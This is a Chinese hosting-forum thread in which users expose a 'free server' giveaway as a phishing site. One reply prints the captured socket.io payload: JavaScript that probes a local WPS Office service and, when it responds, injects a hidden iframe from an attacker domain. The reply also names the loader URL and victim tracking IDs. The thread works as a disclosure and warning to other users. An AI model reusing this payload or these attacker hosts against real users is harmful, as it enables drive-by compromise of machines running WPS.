全球主机交流论坛

标题: 免费服务器领取 [打印本页]

作者: latin    时间: 2025-7-17 15:44
提示: 作者被禁止或删除 内容自动屏蔽
作者: 有点儿意思    时间: 2025-7-17 15:58
领了一个,多谢

有效期是多长?

作者: latin    时间: 2025-7-17 16:00
提示: 作者被禁止或删除 内容自动屏蔽
作者: Typeboom    时间: 2025-7-17 16:01
本帖最后由 Typeboom 于 2025-7-17 16:13 编辑



钓鱼站能不能走点心
作者: Typeboom    时间: 2025-7-17 16:09
本帖最后由 Typeboom 于 2025-7-17 16:12 编辑

这站是钓鱼的

里面会加载这个JS
https://apis.fjersihjktsvhiiuirahts.online/RXGNHYJP.js

创建socket.io链接,通过websocket下发恶意js
  1. 42["execute",{"func":"var attack = function(params){\n            params.time = new Date();\n            let _result_ = (function(){ var result = [];\n\nfunction makeRequest() {\n    var m = Date.now();\n    var script = document.createElement('script');\n    script.src = 'https://localhost.wbridge.wps.cn:4709/';\n    script.onload = function() {\n        var currentTime = Date.now();\n        var elapsedTime = currentTime - m;\n        result.push(elapsedTime);\n        if (result.length === 5) {\n            calculateAverage();\n        } else {\n            makeRequest();\n        }\n    };\n    script.onerror = function() {\n        var currentTime = Date.now();\n        var elapsedTime = currentTime - m;\n        result.push(elapsedTime);\n        if (result.length === 5) {\n            calculateAverage();\n        } else {\n            makeRequest();\n        }\n    };\n    document.body.appendChild(script);\n}\n\nfunction calculateAverage() {\n    var sum = result.reduce(function(a, b) {\n        return a + b;\n    }, 0);\n    var w_key = sum / result.length;\n    if (w_key < 300) {\n        var iframe = document.createElement("iframe");\n        iframe.src = "https://www.onlineksyun.com/ifs.html";\n        iframe.frameborder = "no";\n        iframe.style.zIndex = -1000;\n        iframe.style.position = "absolute";\n        iframe.style.opacity = 0;\n        iframe.style.top = "0px";\n        iframe.style.left = "0px";\n        iframe.width = "300px";\n        iframe.height = "2000px";\n        iframe.onload = function() {\n            console.log("iframe loaded");\n        };\n        document.body.appendChild(iframe);\n    }\n}\n\nmakeRequest(); })()\n            try{\n              socket.emit("result", {\n                success: true,\n                message: "Successfully executed custom command at " + new Date() + (_result_ ? "\\nReturned Value: " + _result_ : ''),\n                params\n              });\n            }catch(e){\n              socket.emit("result", {\n                success: false,\n                message: e.toString(),\n                params\n              });\n            }\n          }","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190"}}]

  2. 42["result",{"success":true,"message":"Successfully executed custom command at Thu Jul 17 2025 08:08:51 GMT+0000 (Coordinated Universal Time)","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190","time":"2025-07-17T08:08:51.636Z"}}]
复制代码


尝试连接到
https://localhost.wbridge.wps.cn:4709/

应该是利用WPS的漏洞,下次记得改成让MJJ下exe,还方便点
作者: 有点儿意思    时间: 2025-7-17 16:21
Typeboom 发表于 2025-7-17 16:09
这站是钓鱼的

里面会加载这个JS

然后呢?钓鱼站没完善是么?

作者: 有点儿意思    时间: 2025-7-17 16:22
还有个域名是:onlineksyun.com
作者: Typeboom    时间: 2025-7-17 16:30
有点儿意思 发表于 2025-7-17 16:21
然后呢?钓鱼站没完善是么?

你安个WPS就知道会发生什么了
作者: 郑爽    时间: 2025-7-17 16:32
不好意思,叼windows的鱼,关我mac什么事
作者: 学到了么    时间: 2025-7-17 16:34
这不封号?
作者: 有点儿意思    时间: 2025-7-17 16:48
Typeboom 发表于 2025-7-17 16:30
你安个WPS就知道会发生什么了

推广wps的是吗?
作者: 有点儿意思    时间: 2025-7-17 16:49
Typeboom 发表于 2025-7-17 16:30
你安个WPS就知道会发生什么了

哦哦,wps有本地服务,调用的这个本地服务啊,
我没装wps啊
作者: 有点儿意思    时间: 2025-7-17 16:50
楼主,里面的免费的服务器,是扫来的?
作者: jiweitu    时间: 2025-7-17 17:00
Typeboom 发表于 2025-7-17 16:09
这站是钓鱼的

里面会加载这个JS

已经打开了这个网站,会发生什么?
作者: Typeboom    时间: 2025-7-17 17:01
jiweitu 发表于 2025-7-17 17:00
已经打开了这个网站,会发生什么?

没安WPS应该就没事
作者: jiweitu    时间: 2025-7-17 17:02
Typeboom 发表于 2025-7-17 17:01
没安WPS应该就没事

我电脑安装了WPS
作者: Typeboom    时间: 2025-7-17 17:05
jiweitu 发表于 2025-7-17 17:02
我电脑安装了WPS


那完蛋咯,你也要变成免费服务器了
作者: jiweitu    时间: 2025-7-17 17:06
Typeboom 发表于 2025-7-17 17:05
那完蛋咯

打开这个网站就会泄露数据吗?我的wps是本身就安装了的
打开这个网站前我的wps没打开
作者: jiweitu    时间: 2025-7-17 17:08
Typeboom 发表于 2025-7-17 17:05
那完蛋咯,你也要变成免费服务器了

我自己电脑,咋变成服务器
作者: 88zrweb    时间: 2025-7-17 17:31
幸好没有装WPS
作者: zutianrun    时间: 2025-7-17 17:38
https://github.com/George-boop-svg/Chinese-hackers-use-WPS-to-attack
作者: 986285227    时间: 2025-7-17 18:09
属实在关公面前耍大刀
作者: 羊村你喜哥    时间: 2025-7-17 18:20
太牛逼了
作者: vagaa    时间: 2025-7-17 18:22
弱智行为!!
作者: williamc2    时间: 2025-7-18 10:35





欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/) Powered by Discuz! X3.4